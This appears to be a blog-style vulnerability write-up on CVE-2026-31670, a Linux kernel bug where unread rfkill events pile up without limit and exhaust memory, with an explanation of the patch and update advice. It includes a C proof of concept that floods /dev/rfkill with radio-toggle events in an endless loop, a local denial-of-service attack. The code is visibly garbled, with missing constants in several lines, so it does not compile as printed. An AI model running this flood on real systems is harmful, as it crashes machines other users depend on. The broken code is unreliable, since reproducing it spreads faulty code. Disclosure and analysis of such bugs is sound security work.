CVE-2026-31670 - Exploiting Linux Kernel’s rfkill Event Flood for Denial of Service

A recent vulnerability in the Linux kernel, identified as CVE-2026-31670, poses a significant threat for systems using the rfkill subsystem. This bug could allow an attacker to exhaust system memory by flooding the kernel with rfkill events, potentially leading to a denial of service (DoS). In this article, we’ll break down what this bug is, its impact, and demonstrate how the exploit works with code snippets. We’ll also provide links to original references for further reading.

What Is rfkill?

rfkill is a subsystem in Linux that manages radio transmitters, like Wi-Fi, Bluetooth, and NFC. It allows enabling or disabling these devices via a consistent interface.

The kernel provides a userspace interface at /dev/rfkill, allowing programs to read and write rfkill events, which are notifications about state changes (enabled/disabled) of these radios.

Description of the Vulnerability

The core of CVE-2026-31670 is simple: While a process can create many rfkill events (by turning radios on/off repeatedly), these events are queued internally for userspace to read. But if the process never reads from /dev/rfkill, the queue of events never empties.

Since there was no limit on the queue size, this could consume all available kernel memory, causing the system to slow down or crash.

The Bug:
> "Userspace can create an unlimited number of rfkill events if the system is so configured, while not consuming them from the rfkill file descriptor, causing a potential out of memory situation."

Commit Fix

Linux kernel maintainers have set a "large" but finite queue limit (100 events), dropping further events once this threshold is reached to prevent abuse.

Patch Reference

Who Is At Risk?

- Systems where untrusted users have access to /dev/rfkill

Impact

- Any local user can intentionally take up all system memory, impacting other processes or causing a system crash.

Below is a simple C code snippet exploiting this vulnerability

// PoC for CVE-2026-31670 by flooding /dev/rfkill event queue

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/rfkill.h>
#include <string.h>
#include <sys/ioctl.h>

int main() {
    int fd = open("/dev/rfkill", O_WRONLY);
    if (fd < ) {
        perror("open");
        return 1;
    }

    struct rfkill_event event;
    memset(&event, , sizeof(event));
    event.op = RFKILL_OP_CHANGE_ALL;  // Request all radios to toggle
    event.soft = 1; // Soft block

    // Flood system with events
    while (1) {
        write(fd, &event, sizeof(event));
        // intentionally do not read from /dev/rfkill
    }

    close(fd);
    return ;
}

Note: Running this as a non-root user may fail on many systems, but in Linux desktops, some users can toggle radios.

How the Patch Fixes the Problem

The kernel now limits the number of pending rfkill events per fd to 100. If the buffer limit is reached and more events are generated, they are dropped until some are read by the userspace process. This puts a cap on resource use and blocks attempts to crash the system this way.

You can see the commit diff here

Linux git commit: Bound pending rfkill events queue

For Users

- Update your system to the latest kernel version (at least 6.8+ or check your distro’s advisories).
- Restrict direct access to /dev/rfkill whenever possible.

References

- CVE-2026-31670 at cve.org
- Linux Kernel Patch commit
- rfkill Documentation

Conclusion

CVE-2026-31670 is a great example of how even seemingly minor kernel interface bugs can cause system-wide havoc. With awareness and timely patching, risks like these can be minimized. Always keep your system and kernel up to date!

Timeline

Published on: 04/24/2026 14:45:17 UTC
Last modified on: 04/27/2026 20:10:26 UTC